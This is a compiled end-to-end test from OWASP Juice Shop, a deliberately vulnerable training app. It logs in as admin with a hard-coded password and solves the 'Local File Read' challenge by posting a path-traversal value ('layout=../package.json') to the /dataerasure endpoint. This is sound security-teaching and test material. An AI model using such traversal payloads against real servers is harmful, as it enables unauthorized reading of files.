"use strict";
/*
 * Copyright (c) 2014-2022 Bjoern Kimminich & the OWASP Juice Shop contributors.
 * SPDX-License-Identifier: MIT
 */
Object.defineProperty(exports, "__esModule", { value: true });
const protractor_1 = require("protractor");
const e2eHelpers_1 = require("./e2eHelpers");
const config = require('config');
describe('/dataerasure', () => {
    (0, e2eHelpers_1.beforeEachLogin)({ email: `admin@${config.get('application.domain')}`, password: 'admin123' });
    describe('challenge "lfr"', () => {
        it('should be possible to perform local file read attack using the browser', () => {
            void protractor_1.browser.waitForAngularEnabled(false);
            void protractor_1.browser.executeScript((baseUrl) => {
                const xhttp = new XMLHttpRequest();
                xhttp.onreadystatechange = function () {
                    if (this.status === 200) {
                        console.log('Success');
                    }
                };
                const params = 'layout=../package.json';
                xhttp.open('POST', `${baseUrl}/dataerasure`);
                xhttp.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
                xhttp.setRequestHeader('Origin', baseUrl);
                xhttp.setRequestHeader('Cookie', `token=${localStorage.getItem('token')}`);
                xhttp.send(params); //eslint-disable-line
            }, protractor_1.browser.baseUrl);
            void protractor_1.browser.driver.sleep(10000);
            void protractor_1.browser.waitForAngularEnabled(true);
        });
        (0, e2eHelpers_1.expectChallengeSolved)({ challenge: 'Local File Read' });
    });
});
//# sourceMappingURL=dataErasureSpec.js.map